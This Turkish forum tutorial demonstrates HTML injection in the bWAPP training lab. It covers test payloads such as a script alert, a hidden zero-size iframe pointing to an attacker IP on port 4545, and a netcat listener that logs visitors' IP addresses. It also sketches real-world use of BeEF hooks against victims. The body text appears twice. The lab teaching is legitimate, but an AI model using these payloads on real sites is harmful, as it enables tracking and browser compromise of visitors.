Merhaba değerli üyeler. bWAPP üzerinden HTML injection u low level de GET ve STORED şeklinde anlatacağım.
Başlamadan Önce
- bWAPP i sanal makine olarak veya tarayıcı üzerinden kullanacak şekilde kurun.
- Burp suite güncelleyin.
- Burp suite sertfikasını google a ekleyin.
- Tarayıcı proxy ayarlarını yapılandırın.
İnternet de burp suite kurulum ve ayarlar olarak araştırın bWAPP kolay. Hata alanlar kuramayanlar bana ulaşabilir.
Tüm bunları yaptıktan sonra bWAPP i açıyoruz. Bir yandan burp suite de çalışabilir. Şuan da bu açık Burp Suite ye ihtiyaç yok ama gene dursun o istekleri bir görelim.
Choose your bug kısmının altındaki kutucuğa bastığınızda bWAPP de olan açıklı web app lerini seçebileceğimiz bir yer geliyor. Bir de level var altında. Bu arada buraya gelmek için giriş yapmanız grek username bee şifre bug . Bu açıklı applerin olduğu yerden HTML İnjection GET seçeneğini seçin. Yanındaki Hack butonuna basın.
Bu tarz bir sayfa çıktı. Bunu bir sitenin giriş yeri olarak düşünün. Kayıt gerektirmeyen bir oyun sitesi gibi diyelim. Bir sitede HTML açığı var mı bilmek için sitenin login kısmı , arama kısımları , yazı yazma yerleri vs. buralarda HTML kodları çalışıyor mu bakılır
Önce bir Ar Thur şeklinde ben bir giriş yapacağım loginden bakalım ne olacak.
İlk resimde gördüğünüz gibi Welcome to ( belirttiğimiz istekleri ) bu şekilde girdi. Bir input olduğunu burda anlıyoruz zaten güzel bu her login de mevcut. İkinci resimde de görüyoruz ki bit HTML Get isteği almışız. Şimdi ise bir HTML kodu ile login yapalım bakalım ne olacak. HTML açığı olup olmadığını anlamanın en iyi yolu bu şekilde denemelerdir. Şuan low da olduğumuz için biraz kolay olacak seri devamı daha karışıklaşır.
HTML Bilmeniz Gerekenler
- Başlıklar
- Tagler
- İmageler
- Url ekleme Script Çalıştırma
- Bodyler
vs. bunları bilseniz yeterli. Kısa zaten 4-5 tane html eğitimi izleyin tamamdır bu konu için.
Şimdi bir başlık etiketi üzerinde Ar Thur olarak login yapalım bakalım ne olacak.
Şeklinde yapacağız.
İlk resimde görüyoruz ki HTML çalıştırabildik. Yani başlık etiketi şeklinde Ar Thur bize girdi biraz büyüdü bu yazı . Güzel bu demekki sitede HTML çalıştırabiliyoruz logininde. İki seçenek var bu durumda ya HTML açığı vardır ya da site sahibi bilerek böyle bir ayar yapmışta olabilir. Bunu daha iyi anlamak için script çalıştırılır şimdi yapacağız. İkinci resimde de bu sefer GET isteğinin kod şeklinde geldi inputlara.
HTML Çalıştırabiliyoruz güzel. Şimdi çeşitli js kodlarını login de çalıştırıp script çalışıyor mu çalışmıyor mu bu şekilde anlayabiliriz. Bunun için google dan yardım alınabilir. HTML İnjection Cheat Seet olarak bir arama yapıp script kodlarına bakabilirsiniz .
Bakın bu şekilde bir kod var. Burda önce Hello başlığını giriyor daha sonra bir script çalıştır diyor ve " Hacked " ı ekran da verecekmi bakalım burda göreceğiz verirse HTML İnj olduğunu anlayabiliriz. XSS mantığına benzer bir açık.
Alt kısmı da boş bırakmayın hata almamak için. Yapalım bunu.
Script i çalıştırdı artık HTML açığı olduğu ilan edilebilir. Peki tamam böyle bir şey oldu da bu ne işe yarar?
Şimdi bu açık da şu yapılabilir. Beef in zararlı bir js kodu alınır login e yapıştırılır login edilir. Daha sonra yukarda olan url alınır bir kişiye atılır . Kişi girince oraya browserı hacklenir kişinin. Şimdi bu biraz sosyal mühendislik istiyor. Stored öyle değil onda iframe denilen bir kod sayesinde daha rahat hackleyebiliyoruz.
Şimdi sağ üstden bu sefer HTML İnjection Stored (blog) olanı seçelim.
Şimdi burayı bir blog sitesi veya forum sitesi olarak düşünün ve yazı yazma textbox ı olarak görün aynı zamanda yazılan yazılar da burada çıkıyor. Aynı şekilde burda da H1 ler denenebilir scriptler denenebilir bakılır HTML çalışıyor mu? Çalışıyor güzel GET isteği alınabiliyor. Ama stored var mı nasıl anlarız? Burp Suite de girdiğiniz bazı kodlar dolayısıyla istekler stored görünebilir.
İframe kodları var. Aynı zamanda. Hacklerın kullandığı kodlardır. Google da İframe Kod Ex olarak yazarsanız örnekleri bulabilirsiniz.
Ben böyle bir kod buldum mesela. Burda width ve height girmeden de yapılabilir ama girirseniz farkı anlayacaksınız iki şekilde deneyin biz direk bu kodu deneyelim. src= den sonrasına bir resim lokasyonu koyalım. THT in logosunu google dan copy image Lokasyon yapın ve kod da tam olarak şöyle olacak.
Kod böyle olur. Şimdi o height ve width bunlar resmin büyüklüğünü ayarlayacak aslında. Bir çalıştıralım kodu bakalım ne olacak.
Evet bu şekilde çalıştırdık ve stored isteği de alındığına göre yine bir HTML açığı var demektir. Peki bu kötüye nasıl kullanılır. Bi kere bu iframe kodu pis bir şey bir site de böyle bir açık varsa. İframe de tutup da url atmaya gerek yok. Direk orayı girenleri etkiler ve ordan dönen istekleri saldırgan bilgisayarında izleyebilir.
Yine aynı şekilde kendi zararlı sitenizi girebilirsiniz. Public ip nizi de girebilirsiniz. Local ip de olur ama hedef localde olmayınca çalışmaz.
Şeklinde bir kod var src den sonrasına ben local ip gireceğim gerçek saldırılarda public ip girilebilir zararlı bir siteye yönlendirilebilir veya direk zararlo js kodu çalıştırılabilir. Şidmi bu kodda biz local ip mizden 4545 portundan gelen bilgileri dinleyeceğiz bunun için terminali açıp.
Yaptığımızda 4545 den gelen istekleri dinleyecek.
İlk resimde dediğim kodu çalıştırdık 4545 den gelen istekleri dinlemeye başladı. İkinci resim de de iframe kodunu çalıştırdık ama hiç bir şey çıkmadı çünkü width ve height i sıfır girdik. Şimdi girip sumbit ettikten sonra terminale dönersek eğer giren kişinin İP adresi çıkacaktır.
Saldırgan ıp lere saldırı yapabilir bu tehlikeli olabilir. Diğer konularda devam edeceğiz bu konu bu kadardı iyi forumlar
.
ANLATIM HATALARIM VARSA BELİRTİN.
Başlamadan Önce
- bWAPP i sanal makine olarak veya tarayıcı üzerinden kullanacak şekilde kurun.
- Burp suite güncelleyin.
- Burp suite sertfikasını google a ekleyin.
- Tarayıcı proxy ayarlarını yapılandırın.
İnternet de burp suite kurulum ve ayarlar olarak araştırın bWAPP kolay. Hata alanlar kuramayanlar bana ulaşabilir.
Tüm bunları yaptıktan sonra bWAPP i açıyoruz. Bir yandan burp suite de çalışabilir. Şuan da bu açık Burp Suite ye ihtiyaç yok ama gene dursun o istekleri bir görelim.
Choose your bug kısmının altındaki kutucuğa bastığınızda bWAPP de olan açıklı web app lerini seçebileceğimiz bir yer geliyor. Bir de level var altında. Bu arada buraya gelmek için giriş yapmanız grek username bee şifre bug . Bu açıklı applerin olduğu yerden HTML İnjection GET seçeneğini seçin. Yanındaki Hack butonuna basın.
Bu tarz bir sayfa çıktı. Bunu bir sitenin giriş yeri olarak düşünün. Kayıt gerektirmeyen bir oyun sitesi gibi diyelim. Bir sitede HTML açığı var mı bilmek için sitenin login kısmı , arama kısımları , yazı yazma yerleri vs. buralarda HTML kodları çalışıyor mu bakılır
Önce bir Ar Thur şeklinde ben bir giriş yapacağım loginden bakalım ne olacak.
İlk resimde gördüğünüz gibi Welcome to ( belirttiğimiz istekleri ) bu şekilde girdi. Bir input olduğunu burda anlıyoruz zaten güzel bu her login de mevcut. İkinci resimde de görüyoruz ki bit HTML Get isteği almışız. Şimdi ise bir HTML kodu ile login yapalım bakalım ne olacak. HTML açığı olup olmadığını anlamanın en iyi yolu bu şekilde denemelerdir. Şuan low da olduğumuz için biraz kolay olacak seri devamı daha karışıklaşır.
HTML Bilmeniz Gerekenler
- Başlıklar
- Tagler
- İmageler
- Url ekleme Script Çalıştırma
- Bodyler
vs. bunları bilseniz yeterli. Kısa zaten 4-5 tane html eğitimi izleyin tamamdır bu konu için.
Şimdi bir başlık etiketi üzerinde Ar Thur olarak login yapalım bakalım ne olacak.
Kod:
<h1>Ar</h1>
Kod:
<h1>Thur</h1>Şeklinde yapacağız.
İlk resimde görüyoruz ki HTML çalıştırabildik. Yani başlık etiketi şeklinde Ar Thur bize girdi biraz büyüdü bu yazı . Güzel bu demekki sitede HTML çalıştırabiliyoruz logininde. İki seçenek var bu durumda ya HTML açığı vardır ya da site sahibi bilerek böyle bir ayar yapmışta olabilir. Bunu daha iyi anlamak için script çalıştırılır şimdi yapacağız. İkinci resimde de bu sefer GET isteğinin kod şeklinde geldi inputlara.
HTML Çalıştırabiliyoruz güzel. Şimdi çeşitli js kodlarını login de çalıştırıp script çalışıyor mu çalışmıyor mu bu şekilde anlayabiliriz. Bunun için google dan yardım alınabilir. HTML İnjection Cheat Seet olarak bir arama yapıp script kodlarına bakabilirsiniz .
Kod:
<h1>Hello,<script>alert("Hacked")</script>!</h1>Bakın bu şekilde bir kod var. Burda önce Hello başlığını giriyor daha sonra bir script çalıştır diyor ve " Hacked " ı ekran da verecekmi bakalım burda göreceğiz verirse HTML İnj olduğunu anlayabiliriz. XSS mantığına benzer bir açık.
Kod:
<h1>Hello,<script>alert("Hacked")</script>!</h1>
Kod:
sadadasdaAlt kısmı da boş bırakmayın hata almamak için. Yapalım bunu.
Script i çalıştırdı artık HTML açığı olduğu ilan edilebilir. Peki tamam böyle bir şey oldu da bu ne işe yarar?
Şimdi bu açık da şu yapılabilir. Beef in zararlı bir js kodu alınır login e yapıştırılır login edilir. Daha sonra yukarda olan url alınır bir kişiye atılır . Kişi girince oraya browserı hacklenir kişinin. Şimdi bu biraz sosyal mühendislik istiyor. Stored öyle değil onda iframe denilen bir kod sayesinde daha rahat hackleyebiliyoruz.
Şimdi sağ üstden bu sefer HTML İnjection Stored (blog) olanı seçelim.
Şimdi burayı bir blog sitesi veya forum sitesi olarak düşünün ve yazı yazma textbox ı olarak görün aynı zamanda yazılan yazılar da burada çıkıyor. Aynı şekilde burda da H1 ler denenebilir scriptler denenebilir bakılır HTML çalışıyor mu? Çalışıyor güzel GET isteği alınabiliyor. Ama stored var mı nasıl anlarız? Burp Suite de girdiğiniz bazı kodlar dolayısıyla istekler stored görünebilir.
İframe kodları var. Aynı zamanda. Hacklerın kullandığı kodlardır. Google da İframe Kod Ex olarak yazarsanız örnekleri bulabilirsiniz.
Kod:
<iframe src="http://www.siteadresi.com" width="500" height="500"></iframe>Ben böyle bir kod buldum mesela. Burda width ve height girmeden de yapılabilir ama girirseniz farkı anlayacaksınız iki şekilde deneyin biz direk bu kodu deneyelim. src= den sonrasına bir resim lokasyonu koyalım. THT in logosunu google dan copy image Lokasyon yapın ve kod da tam olarak şöyle olacak.
Kod:
<iframe src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2e/T%C3%BCrkHackTeam_Logo.png/1200px-T%C3%BCrkHackTeam_Logo.png" width="500" height="500"></iframe>Kod böyle olur. Şimdi o height ve width bunlar resmin büyüklüğünü ayarlayacak aslında. Bir çalıştıralım kodu bakalım ne olacak.
Evet bu şekilde çalıştırdık ve stored isteği de alındığına göre yine bir HTML açığı var demektir. Peki bu kötüye nasıl kullanılır. Bi kere bu iframe kodu pis bir şey bir site de böyle bir açık varsa. İframe de tutup da url atmaya gerek yok. Direk orayı girenleri etkiler ve ordan dönen istekleri saldırgan bilgisayarında izleyebilir.
Yine aynı şekilde kendi zararlı sitenizi girebilirsiniz. Public ip nizi de girebilirsiniz. Local ip de olur ama hedef localde olmayınca çalışmaz.
Kod:
<iframe src="http://publicip:4545"/test height="0" width="0"></iframe>Şeklinde bir kod var src den sonrasına ben local ip gireceğim gerçek saldırılarda public ip girilebilir zararlı bir siteye yönlendirilebilir veya direk zararlo js kodu çalıştırılabilir. Şidmi bu kodda biz local ip mizden 4545 portundan gelen bilgileri dinleyeceğiz bunun için terminali açıp.
Kod:
nc -nlvp 4545Yaptığımızda 4545 den gelen istekleri dinleyecek.
İlk resimde dediğim kodu çalıştırdık 4545 den gelen istekleri dinlemeye başladı. İkinci resim de de iframe kodunu çalıştırdık ama hiç bir şey çıkmadı çünkü width ve height i sıfır girdik. Şimdi girip sumbit ettikten sonra terminale dönersek eğer giren kişinin İP adresi çıkacaktır.
Saldırgan ıp lere saldırı yapabilir bu tehlikeli olabilir. Diğer konularda devam edeceğiz bu konu bu kadardı iyi forumlar
.ANLATIM HATALARIM VARSA BELİRTİN.
Son düzenleme:
